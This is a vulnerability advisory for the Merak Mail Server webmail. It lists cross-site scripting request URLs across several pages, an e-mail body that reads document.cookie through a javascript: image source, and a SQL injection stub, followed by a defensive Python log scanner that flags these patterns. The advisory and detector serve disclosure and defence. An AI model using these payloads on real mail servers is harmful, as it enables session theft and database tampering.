Merak Mail Server Webmail Multiple Vulnerabilities
An exploit is not required. Examples were provided:

Cross-site scripting examples:

/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category="><script>alert()</script>&cserver=&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=">[XSS]&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=&ext=">[XSS]
/address.html?id=[id]&sort=&selectsort=&global=">[XSS]&showgroups=&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=">[XSS]&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=&showlite=">[XSS]&category=&cserver=&ext=
/settings.html?autoresponder=1&id=[id]&spage=">[XSS]
/settings.html?autoresponder=">[XSS]&id=[id]&spage=0
/readmail.html?id=[id]&folder=">[XSS]
/attachment.html?attachmentpage_text_error=">[XSS]
/calendar.html?id=1&schedule=admin%40merakdemo.com&cv=n&folder=<script>alert()</script>
/calendar.html?id=1&schedule=koko%40merakdemo.com&sf=addevent&cv=d&ct=">[XSS]
/calendar.html?id=[id]&cv=">[XSS]&ct=[ct]&sf=addevent&ESdhour=8

HTML injection example, email body contents:

<IMG alt="" hspace=0 src="javascript:alert(document.cookie)" align=baseline border=0><IFRAME src="http://www.google.com"></body> </html> </IFRAME>

SQL injection example:

/calendar.html?id=1'&schedule=[SQL]
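A defender-side check for the request patterns listed above, as an added example that is not part of the original advisory: it scans web-server access-log lines for the listed pages and flags query parameters whose decoded value contains markup characters, plus a quote in the calendar.html id parameter. The log format, the sample lines and the function names are assumptions constructed for illustration; the HTML injection in e-mail bodies is not covered.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Pages named in the advisory's examples.
PAGES = {"/address.html", "/settings.html", "/readmail.html",
         "/attachment.html", "/calendar.html"}
# Characters that let a reflected value close an attribute or open a tag.
MARKUP = re.compile(r'[<>"]')
# Assumption: request lines look like common log format ("METHOD URI HTTP/x.y").
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:00:00:01 +0000] "GET /address.html?id=abc123&sort=name'
    '&category=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&cserver=&ext= HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2000:00:00:02 +0000] "GET /calendar.html?id=1%27&schedule=x HTTP/1.1" 200 300',
    '192.0.2.12 - - [01/Jan/2000:00:00:03 +0000] "GET /readmail.html?id=abc123&folder=Inbox HTTP/1.1" 200 900',
    '192.0.2.13 - - [01/Jan/2000:00:00:04 +0000] "GET /calendar.html?id=1&schedule=admin%40example.test&cv=n HTTP/1.1" 200 100',
]

def inspect_uri(uri):
    """Return (parameter, reason) findings for one request URI."""
    parts = urlsplit(uri)
    path = parts.path.lower()  # assumption: page names are matched case-insensitively
    if path not in PAGES:
        return []
    findings = []
    # parse_qsl percent-decodes each value, so %22%3E is seen as ">.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if MARKUP.search(value):
            findings.append((name, "markup"))
        elif path == "/calendar.html" and name == "id" and "'" in value:
            findings.append((name, "quote-in-id"))
    return findings

def scan(lines):
    """Return (line_number, parameter, reason) for every suspicious parameter."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            hits.extend((number, *finding) for finding in inspect_uri(match.group(1)))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```
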